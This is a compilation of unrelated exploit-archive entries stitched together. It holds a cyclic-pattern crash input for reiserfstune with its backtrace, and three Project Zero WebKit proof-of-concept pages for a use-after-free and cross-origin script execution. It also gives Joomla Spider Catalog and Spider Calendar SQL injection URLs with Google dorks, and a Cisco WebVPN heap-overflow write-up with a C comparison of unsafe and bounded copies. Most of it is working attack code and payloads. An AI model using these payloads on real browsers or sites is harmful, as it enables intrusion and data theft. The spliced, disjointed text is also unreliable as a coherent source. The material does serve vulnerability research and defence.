'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-C' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-m' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-a' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-M' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-V' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2'
- Out -
*** buffer overflow detected ***: /sbin/reiserfstune terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f00ba498bcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7f00ba521037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7f00ba51f170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6729)[0x7f00ba51e729]
/lib/x86_64-linux-gnu/libc.so.6(_IO_default_xsputn+0xac)[0x7f00ba49cbdc]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0x1ebb)[0x7f00ba470bbb]
/lib/x86_64-linux-gnu/libc.so.6(__vsprintf_chk+0x8c)[0x7f00ba51e7bc]
/usr/lib/x86_64-linux-gnu/libreiserfscore.so.0(die+0xad)[0x7f00babebbfd]
/sbin/reiserfstune(+0x2f07)[0x561ea5aa7f07]
/sbin/reiserfstune(+0x1d9c)[0x561ea5aa6d9c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f00ba4482b1]
/sbin/reiserfstune(+0x2b2a)[0x561ea5aa7b2a]
======= Memory map: ========
7f00babce000-7f00babcf000 rw-p 00003000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babcf000-7f00babf7000 r-xp 00000000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00babf7000-7f00badf6000 ---p 00028000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf6000-7f00badf7000 r--p 00027000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf7000-7f00badf8000 rw-p 00028000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf8000-7f00bae01000 rw-p 00000000 00:00 0
7f00bae01000-7f00bae24000 r-xp 00000000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00baff9000-7f00baffb000 rw-p 00000000 00:00 0
7f00bb020000-7f00bb024000 rw-p 00000000 00:00 0
7f00bb024000-7f00bb025000 r--p 00023000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00bb025000-7f00bb026000 rw-p 00024000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00bb026000-7f00bb027000 rw-p 00000000 00:00 0
7ffd3d63f000-7ffd3d664000 rw-p 00000000 00:00 0 [stack]
7ffd3d6bd000-7ffd3d6bf000 r--p 00000000 00:00 0 [vvar]
7ffd3d6bf000-7ffd3d6c1000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Aborted
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1187
Here's a snippet of Element::setAttributeNodeNS.
ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
{
    ...
    setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);
    attrNode.attachToElement(*this);
    treeScope().adoptIfNeeded(attrNode);
    ensureAttrNodeListForElement(*this).append(&attrNode);
    return WTFMove(oldAttrNode);
}
|setAttributeInternal| may execute arbitrary JavaScript (in the PoC below, through a javascript: URL set as the src attribute of an iframe). If |setAttributeNodeNS| is called again from within |setAttributeInternal|, two |Attr| objects with the same owner element and the same name exist once the first |setAttributeNodeNS| call returns. One of them keeps a raw pointer to the owner element even after that element is freed, so a later access through it is a use-after-free.
PoC:
-->
<body>
<script>
function gc() {
    for (let i = 0; i < 0x40; i++) {
        new ArrayBuffer(0x1000000);
    }
}

window.callback = () => {
    window.callback = null;
    d.setAttributeNodeNS(src);
    f.setAttributeNodeNS(document.createAttribute('src'));
};

let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';

let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
f.setAttributeNodeNS(src);
f.remove();
f = null;
src = null;

gc();

alert(d.attributes[0].ownerElement);
</script>
</body>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1163
Here's a snippet of Document::prepareForDestruction:
void Document::prepareForDestruction()
{
    if (m_hasPreparedForDestruction)
        return;
    ...
    detachFromFrame();
    m_hasPreparedForDestruction = true;
}
Document::prepareForDestruction is called on the assumption that the document will not be used with its frame again. However, if the frame is placed into the page cache while Document::prepareForDestruction runs, the document's frame is stored in a CachedFrame object that will reattach it later. After that, the document's frame is never detached again, because |m_hasPreparedForDestruction| is already set and the early return above skips detachFromFrame().
PoC:
-->
<body>
Click anywhere.
<script>
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function waitFor(check, cb) {
    let it = setInterval(() => {
        if (check()) {
            clearInterval(it);
            cb();
        }
    }, 10);
}

window.onclick = () => {
    window.onclick = null;
    w = open(createURL(''), '', 'width=500, height=500');
    w.onload = () => {
        setTimeout(() => {
            let f = w.document.body.appendChild(document.createElement('iframe'));
            f.contentWindow.onunload = () => {
                f.contentWindow.onunload = null;
                w.__defineGetter__('navigator', () => new Object());
                let a = w.document.createElement('a');
                a.href = 'about:blank';
                a.click();
                setTimeout(() => {
                    w.history.back();
                    setTimeout(() => {
                        let d = w.document;
                        w.location = 'javascript:' + encodeURI(`"<script>location = 'https://abc.xyz/';</scrip` + `t>"`);
                        let it = setInterval(() => {
                            try {
                                w.xxxx;
                            } catch (e) {
                                clearInterval(it);
                                let a = d.createElement('a');
                                a.href = 'javascript:alert(location);';
                                a.click();
                            }
                        }, 10);
                    }, 100);
                }, 100);
            };
            w.location = 'javascript:""';
        }, 0);
    };
}
</script>
</body>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1197
This is similar to https://bugs.chromium.org/p/project-zero/issues/detail?id=1151, but this time JavaScript handlers can fire inside FrameLoader::open:
void FrameLoader::open(CachedFrameBase& cachedFrame)
{
    ...
    clear(document, true, true, cachedFrame.isMainFrame()); <<--------- prepareForDestruction, which fires unload events, is called from here.
    ...
}
PoC:
-->
<html>
<body>
Click anywhere...
<script>
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function navigate(w, url) {
    let a = w.document.createElement('a');
    a.href = url;
    a.click();
}

window.onclick = () => {
    window.w = open('about:blank', 'w', 'width=500, height=500');
    let i0 = w.document.body.appendChild(document.createElement('iframe'));
    let i1 = w.document.body.appendChild(document.createElement('iframe'));
    i0.contentWindow.onbeforeunload = () => {
        i0.contentWindow.onbeforeunload = null;
        navigate(w, 'about:blank');
    };
    navigate(i0.contentWindow, createURL(`
<body>
<script>
</scrip` + 't></body>'));
    setTimeout(() => {
        let g = i0.contentDocument.body.appendChild(document.createElement('iframe'));
        let x = new g.contentWindow.XMLHttpRequest();
        x.onabort = () => {
            parseFloat('axfasdfasfdsfasfsfasdf');
            i0.contentDocument.write();
            navigate(w, 'https://abc.xyz/');
            showModalDialog(createURL(`
<script>
let it = setInterval(() => {
    try {
        opener.w.document.x;
    } catch (e) {
        clearInterval(it);
        window.close();
    }
}, 10);
</scrip` + 't>'));
            setTimeout(() => {
                i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>';
                navigate(i1.contentWindow, 'about:srcdoc');
            }, 10);
        };
        x.open('GET', createURL('x'.repeat(0x1000000)));
        x.send();
        w.history.go(-2);
    }, 200);
};
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1176
When a document loads "about:blank" or "about:srcdoc", it tries to inherit the security origin from its parent frame, or from its opener frame if there is no parent frame. Normally a subframe's document never inherits its opener frame's security origin, because it has a parent frame, and it should never happen at all. However, when the subframe is cached, only the parent frame is detached; the opener frame is not. So in that case the document can inherit the opener frame's security origin.
void Document::initSecurityContext()
{
    ...
    if (!shouldInheritSecurityOriginFromOwner(m_url)) <<----- checks whether m_url is about:blank or about:srcdoc.
        return;

    // If we do not obtain a meaningful origin from the URL, then we try to
    // find one via the frame hierarchy.
    Frame* parentFrame = m_frame->tree().parent();
    Frame* openerFrame = m_frame->loader().opener();

    Frame* ownerFrame = parentFrame;
    if (!ownerFrame)
        ownerFrame = openerFrame;

    if (!ownerFrame) {
        didFailToInitializeSecurityOrigin();
        return;
    }
    ...
    setCookieURL(ownerFrame->document()->cookieURL());

    // We alias the SecurityOrigins to match Firefox, see Bug 15313
    // https://bugs.webkit.org/show_bug.cgi?id=15313
    setSecurityOriginPolicy(ownerFrame->document()->securityOriginPolicy());
    ...
}
PoC:
-->
<body>
Click anywhere.
<script>
window.onclick = () => {
    window.onclick = null;
    let w = open('about:blank', '', 'width=500, height=500');
    w.eval(`
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow.name = 'zzz';
opener.open('about:blank', 'zzz');

function navigate(w, url, cb = null) {
    w.__check = true;
    let a = w.document.createElement('a');
    a.href = url;
    a.click();
    if (!cb)
        return;
    let it = setInterval(() => {
        let navigated = false;
        try {
            if (!w.__check)
                navigated = true;
        } catch (e) {
            navigated = true;
        }
        if (navigated) {
            clearInterval(it);
            cb();
        }
    }, 10);
}

navigate(opener, 'https://abc.xyz/', () => {
    f.srcdoc = '<script>opener.alert(opener.location);</scrip' + 't>';
    f.contentWindow.onbeforeunload = () => {
        f.contentWindow.onbeforeunload = null;
        navigate(window, 'about:blank');
    };
    navigate(f.contentWindow, 'about:srcdoc');
});`);
}
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercatalog
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/
# Demo: http://demo.web-dorado.com/spider-catalog.html
# Version: 1.8.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL]
#
# http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercalendar
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/
# Demo: http://demo.web-dorado.com/spider-calendar.html
# Version: 3.2.16
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL]
# Etc...
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=998
The WebVPN http server exposes a way of accessing files from CIFS with a URL hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file.
When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates two C strings in an http_cifs_context struct:
http_cifs_context:
    +0x160 char* file_dir
    +0x168 char* file_name
These strings are copied in various places, and the copying is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:
filename_copy_buf = calloc(1LL, 336LL);
net_handle[10] = filename_copy_buf;
if ( filename_copy_buf )
{
    src_len = _wrap_strlen(filename_from_request);
    if ( filename_from_request[src_len - 1] == ('|') )
    {
        // wrong length (src length)
        strncpy((char *)filename_copy_buf, filename_from_request,
                src_len - 1);
    }
In this case, a fixed-size buffer (|filename_copy_buf|, 336 bytes) is allocated. Later, strncpy is called to copy into it, but the length passed is derived from the src string, which can be larger than 336 bytes. This leads to a heap overflow.
There appear to be various other places where the copying is done in an unsafe way:
http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
Possibly http_add_query_str_from_context. There are probably others that I missed.
Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.
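The two copy patterns side by side, as an added example written for this page (it is not Cisco's code and not part of the Project Zero report): a model of the strncpy call whose bound is taken from the source string, next to a copy bounded by the destination. The 336-byte allocation and the trailing '|' marker come from the pseudocode above; the function names, the constructed 500-'A' name (mirroring the repro below) and the behaviour for names without a trailing '|' are assumptions. The vulnerable variant does not write past the buffer; it returns the byte count the original strncpy would have written, so the two can be compared safely.

```c
/*
 * Added example, not Cisco's code: models the ewaURLHookCifs copy from the
 * report above. CIFS_NAME_BUF (336) and the '|' marker come from the
 * pseudocode; everything else is an assumption made for illustration.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CIFS_NAME_BUF 336   /* calloc(1, 336) in the pseudocode */

/*
 * Models the vulnerable branch: strncpy(dst, src, src_len - 1) when the
 * name ends in '|'. Instead of performing the copy it returns the number
 * of bytes that call would write, which is the figure to compare with the
 * destination size. Names without a trailing '|' take a code path the
 * report does not show; this model returns 0 for them (assumption).
 */
size_t vulnerable_copy_len(const char *filename_from_request)
{
    size_t src_len = strlen(filename_from_request);
    if (src_len == 0 || filename_from_request[src_len - 1] != '|')
        return 0;
    return src_len - 1;          /* bounded by the SOURCE: the bug */
}

/* 1 if the shown strncpy would write past a CIFS_NAME_BUF-byte chunk. */
int vulnerable_would_overflow(const char *filename_from_request)
{
    return vulnerable_copy_len(filename_from_request) > CIFS_NAME_BUF;
}

/*
 * Hardened copy: the bound is the DESTINATION size. Drops a trailing '|'
 * marker, refuses names that do not fit together with the terminating
 * NUL, and always NUL-terminates dst. Returns the number of bytes copied
 * (excluding the NUL) or -1 if the name was rejected.
 */
int safe_copy_cifs_name(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len > 0 && src[len - 1] == '|')
        len--;                                /* strip the marker */
    if (dst_size == 0 || len >= dst_size)     /* no room for the NUL */
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return (int)len;
}

/*
 * Constructed input mirroring the repro: n 'A' characters followed by the
 * '|' marker. out must hold n + 2 bytes.
 */
void build_overlong_name(char *out, size_t n)
{
    memset(out, 'A', n);
    out[n] = '|';
    out[n + 1] = '\0';
}

int main(void)
{
    char name[600];
    char dst[CIFS_NAME_BUF];
    int rc;

    build_overlong_name(name, 500);           /* the 500 'A's from the repro */
    printf("vulnerable strncpy would write %zu bytes into a %d-byte chunk (overflow: %d)\n",
           vulnerable_copy_len(name), CIFS_NAME_BUF, vulnerable_would_overflow(name));
    printf("hardened copy of the same name: %d\n",
           safe_copy_cifs_name(dst, sizeof dst, name));

    rc = safe_copy_cifs_name(dst, sizeof dst, "file.txt|");
    printf("hardened copy of \"file.txt|\": %d -> \"%s\"\n", rc, dst);
    return 0;
}
```

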